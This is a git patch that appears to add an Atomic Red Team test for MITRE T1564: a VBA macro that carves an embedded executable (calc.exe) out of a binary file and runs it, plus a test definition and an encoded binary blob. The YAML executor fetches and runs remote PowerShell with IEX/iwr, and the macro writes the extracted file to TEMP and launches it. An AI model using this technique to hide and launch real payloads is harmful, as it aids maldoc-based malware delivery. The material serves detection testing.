From 78507aedceaf80dcd340e17fe57d5ac09123e420 Mon Sep 17 00:00:00 2001
From: Ama Smuggle Avocados
 <47680420+amasmuggleavocados@users.noreply.github.com>
Date: Wed, 16 Dec 2020 10:46:56 -0500
Subject: [PATCH] Extractbinary (#1332)

* initial

* moving file

* hard-code to winword process

Co-authored-by: avocado <avocados@smuggler.com>
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1564/T1564.yaml              |  40 ++++++++++++++++++++++
 atomics/T1564/bin/extractme.bin       | Bin 0 -> 33022 bytes
 atomics/T1564/src/T1564-macrocode.txt |  46 ++++++++++++++++++++++++++
 3 files changed, 86 insertions(+)
 create mode 100644 atomics/T1564/T1564.yaml
 create mode 100644 atomics/T1564/bin/extractme.bin
 create mode 100644 atomics/T1564/src/T1564-macrocode.txt

diff --git a/atomics/T1564/T1564.yaml b/atomics/T1564/T1564.yaml
new file mode 100644
index 00000000..9a59a90b
--- /dev/null
+++ b/atomics/T1564/T1564.yaml
@@ -0,0 +1,40 @@
+attack_technique: T1564
+display_name: "Hide Artifacts"
+atomic_tests:
+- name: Extract binary files via VBA
+  auto_generated_guid: 
+  description: |
+    This module extracts a binary (calc.exe) from inside of another binary. 
+    
+    In the wild maldoc authors will use this technique to hide binaries inside of files stored 
+    within the office document itself. An example of this technique can be seen in sample
+
+    f986040c7dd75b012e7dfd876acb33a158abf651033563ab068800f07f508226
+
+    This sample contains a document inside of itself. Document 1 is the actual maldoc itself, document 2
+    is the same document without all the malicious code. Document 1 will copy Document 2 to the file system
+    and then "peek" inside of this document and pull out the oleObject.bin file. Contained inside of this
+    oleObject.bin file is a payload that is parsed out and executed on the file system.
+  supported_platforms:
+  - windows
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Microsoft Word must be installed
+    prereq_command: |
+      try {
+        New-Object -COMObject "Word.Application" | Out-Null
+        Stop-Process -Name "winword"
+        exit 0
+      } catch { exit 1 }
+    get_prereq_command: |
+      Write-Host "You will need to install Microsoft Word manually to meet this requirement"
+  executor:
+    command: |
+      $macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt")
+      $macro = $macro -replace "aREPLACEMEa", "PathToAtomicsFolder\T1564\bin\extractme.bin"
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+      Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap
+    cleanup_command: |
+      Remove-Item "$env:TEMP\extracted.exe" -ErrorAction Ignore
+    name: powershell
diff --git a/atomics/T1564/bin/extractme.bin b/atomics/T1564/bin/extractme.bin
new file mode 100644
index 0000000000000000000000000000000000000000..96610b473e10d0f61391db33b700caad5c7982a3
GIT binary patch
literal 33022
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
X^!`Kl14lpS(JVT|kNM~SI}Q9lD#F_V

literal 0
HcmV?d00001

diff --git a/atomics/T1564/src/T1564-macrocode.txt b/atomics/T1564/src/T1564-macrocode.txt
new file mode 100644
index 00000000..98759b8a
--- /dev/null
+++ b/atomics/T1564/src/T1564-macrocode.txt
@@ -0,0 +1,46 @@
+Sub Extract()
+
+    Dim peBin%
+    Dim byt As Byte
+    Dim memArray() As Variant
+    
+    peBin = FreeFile
+    FName = "aREPLACEMEa"
+    outName = Environ$("TEMP") + "\extracted.exe"
+    Open FName For Binary Access Read As peBin
+
+    cnt = 0
+    
+    Do While Not EOF(peBin)
+        Get peBin, , byt
+        If Hex(byt) = "4D" Then
+            ReDim Preserve memArray(cnt)
+            memArray(cnt) = Hex(byt)
+            cnt = cnt + 1
+            Get peBin, , byt
+            If Hex(byt) = "5A" Then
+                ReDim Preserve memArray(cnt)
+                memArray(cnt) = Hex(byt)
+                cnt = cnt + 1
+                Get peBin, , byt
+                Do While Not EOF(peBin)
+                    ReDim Preserve memArray(cnt)
+                    memArray(cnt) = Hex(byt)
+                    cnt = cnt + 1
+                    Get peBin, , byt
+                Loop
+            End If
+        End If
+    Loop
+    
+    Close peBin
+
+    Open (outName) For Binary Lock Read Write As #1
+    For a = 0 To UBound(memArray)
+        Put #1, , CByte("&h" & memArray(a))
+    Next a
+    Close
+
+    Call Shell(outName, vbNormalFocus)
+
+End Sub